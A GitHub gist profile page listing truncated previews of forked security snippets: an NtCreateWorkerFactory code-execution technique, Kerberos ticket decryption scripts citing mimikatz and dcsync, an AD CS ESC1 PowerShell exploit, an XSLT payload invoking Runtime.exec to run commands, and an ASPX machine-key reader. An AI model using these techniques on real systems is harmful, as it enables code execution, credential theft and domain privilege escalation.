Skip to content

Instantly share code, notes, and snippets.

View Dliv3's full-sized avatar
🤣
hacking

Dliv3

🤣
hacking
1.1k followers · 251 following
View GitHub Profile
@Dliv3
Dliv3 / Source.cpp
Created December 7, 2023 10:35 — forked from mgeeky/Source.cpp
Thread Execution via NtCreateWorkerFactory
#include <Windows.h>
#include <winternl.h>
#include <stdio.h>
#define WORKER_FACTORY_FULL_ACCESS 0xf00ff
// https://github.com/winsiderss/systeminformer/blob/17fb2e0048f062a04394c4ccd615b611e6ffd45d/phnt/include/ntexapi.h#LL1096C1-L1115C52
typedef enum _WORKERFACTORYINFOCLASS
{
WorkerFactoryTimeout, // LARGE_INTEGER
@Dliv3
Dliv3 / decryptKerbTicket.py
Created July 30, 2023 05:47 — forked from tothi/decryptKerbTicket.py
Decrypt kerberos tickets and parse out authorization data
#!/usr/bin/env python3
# NOTE: this script was created for educational purposes to assist learning about kerberos tickets.
# Likely to have a few bugs that cause it to fail to decrypt some TGT or Service tickets.
#
# Recommended Instructions:
# Obtain valid kerberos tickets using Rubeus or mimikatz "sekurlsa::tickets /export"
# Optionally convert tickets to ccache format using kekeo "misc::convert ccache <ticketName.kirbi>"
# Obtain appropriate aes256 key using dcsync (krbtgt for TGT or usually target computer account for Service Ticket)
# Run this script to decrypt:
# ./decryptKerbTicket.py -k 5c7ee0b8f0ffeedbeefdeadbeeff1eefc7d313620feedbeefdeadbeefafd601e -t ./[email protected][email protected]
@Dliv3
Dliv3 / unwxapkg.py
Created April 13, 2023 10:44 — forked from Integ/unwxapkg.py
A useful tool for unpack wxapkg file with python3 surport.
# coding: utf-8
# py2 origin author lrdcq
# usage python3 unwxapkg.py filename
__author__ = 'Integ: https://github.com./integ'
import sys, os
import struct
class WxapkgFile(object):
@Dliv3
Dliv3 / esc1.ps1
Created February 23, 2023 04:47 — forked from b4cktr4ck2/esc1.ps1
PowerShell script to exploit ESC1/retrieve your own NTLM password hash.
#Thank you @NotMedic for troubleshooting/validating stuff!
$password = Read-Host -Prompt "Enter Password"
#^^ Feel free to hardcode this for running in a beacon/not retyping it all the time!
$server = "admin" #This will just decide the name of the cert request files that are created. I didn't want to change the var name so it's server for now.
$CERTPATH = "C:\Users\lowpriv\Desktop\" #Where do you want the cert requests to be stored?
$CAFQDN = "dc01.alexlab.local" #hostname of underlying CA box.
$CASERVER = "alexlab-dc01-ca" #CA name.
$CA = $CAFQDN + "\" + $CASERVER
@Dliv3
Dliv3 / PatchExtract.ps1
Created November 11, 2022 13:42 — forked from wumb0/PatchExtract.ps1
a gist copy of patch extract by Greg Lanaris
<#
____ ______ ______ ____ __ __
/\ _`\ /\ _ \ /\__ _\/\ _`\ /\ \/\ \
\ \ \L\ \\ \ \L\ \\/_/\ \/\ \ \/\_\\ \ \_\ \
\ \ ,__/ \ \ __ \ \ \ \ \ \ \/_/_\ \ _ \
\ \ \/ \ \ \/\ \ \ \ \ \ \ \L\ \\ \ \ \ \
\ \_\ \ \_\ \_\ \ \_\ \ \____/ \ \_\ \_\
\/_/ \/_/\/_/ \/_/ \/___/ \/_/\/_/
@Dliv3
Dliv3 / delta_patch.py
Created November 11, 2022 13:42 — forked from wumb0/delta_patch.py
a script for applying MS patch deltas
from ctypes import (windll, wintypes, c_uint64, cast, POINTER, Union, c_ubyte,
LittleEndianStructure, byref, c_size_t)
import zlib
# types and flags
DELTA_FLAG_TYPE = c_uint64
DELTA_FLAG_NONE = 0x00000000
DELTA_APPLY_FLAG_ALLOW_PA19 = 0x00000001
@Dliv3
Dliv3 / select.xslt
Created September 8, 2022 11:30 — forked from thanatoskira/select.xslt
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template>
<!-- #113 Methodref: java/lang/Runtime.getRuntime:()Ljava/lang/Runtime; -->
<!-- #119 Methodref: java/lang/Runtime.exec:(Ljava/lang/String;)Ljava/lang/Process; -->
<!-- #114 Utf8: open -a calculator -->
<!-- #115 String: touch /tmp/pwn -->
<xsl:value-of select="Runtime:exec(Runtime:getRuntime(),'open -a calculator')" xmlns:Runtime="java.lang.Runtime"/>
<xsl:value-of select="at:new()" xmlns:at="org.apache.xalan.xsltc.runtime.AbstractTranslet"/>
<!-- #132 Utf8: <init> -->
<AAA select="&lt;init&gt;"/>
@Dliv3
Dliv3 / decryptKerbTicket.py
Created September 1, 2022 06:18 — forked from xan7r/decryptKerbTicket.py
Decrypt kerberos tickets and parse out authorization data
#!/usr/bin/env python2
# NOTE: this script was created for educational purposes to assist learning about kerberos tickets.
# Likely to have a few bugs that cause it to fail to decrypt some TGT or Service tickets.
#
# Recommended Instructions:
# Obtain valid kerberos tickets using Rubeus or mimikatz "sekurlsa::tickets /export"
# Optionally convert tickets to ccache format using kekeo "misc::convert ccache <ticketName.kirbi>"
# Obtain appropriate aes256 key using dcsync (krbtgt for TGT or usually target computer account for Service Ticket)
# Run this script to decrypt:
# ./decryptKerbTicket.py -k 5c7ee0b8f0ffeedbeefdeadbeeff1eefc7d313620feedbeefdeadbeefafd601e -t ./[email protected][email protected]
@Dliv3
Dliv3 / machineKeyFinder.aspx
Created June 21, 2022 12:18 — forked from irsdl/machineKeyFinder.aspx
To find validation and decryption keys when AutoGenerate has been used in Machine Key settings
<%@ Page Language="C#" %>
<%
// Read https://soroush.secproject.com/blog/2019/05/danger-of-stealing-auto-generated-net-machine-keys/
Response.Write("<br/><hr/>");
byte[] autoGenKeyV4 = (byte[]) Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\ASP.NET\\4.0.30319.0\\", "AutoGenKeyV4", new byte[]{});
if(autoGenKeyV4!=null)
Response.Write("HKCU\\Software\\Microsoft\\ASP.NET\\4.0.30319.0\\AutoGenKeyV4: "+BitConverter.ToString(autoGenKeyV4).Replace("-", string.Empty));
Response.Write("<br/>");
byte[] autoGenKey = (byte[]) Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\ASP.NET\\2.0.50727.0\\", "AutoGenKey", new byte[]{});
if(autoGenKey!=null)
@Dliv3
Dliv3 / main.go
Created May 22, 2021 03:23 — forked from walm/main.go
Simple Golang DNS Server
package main
import (
"fmt"
"log"
"strconv"
"github.com/miekg/dns"
)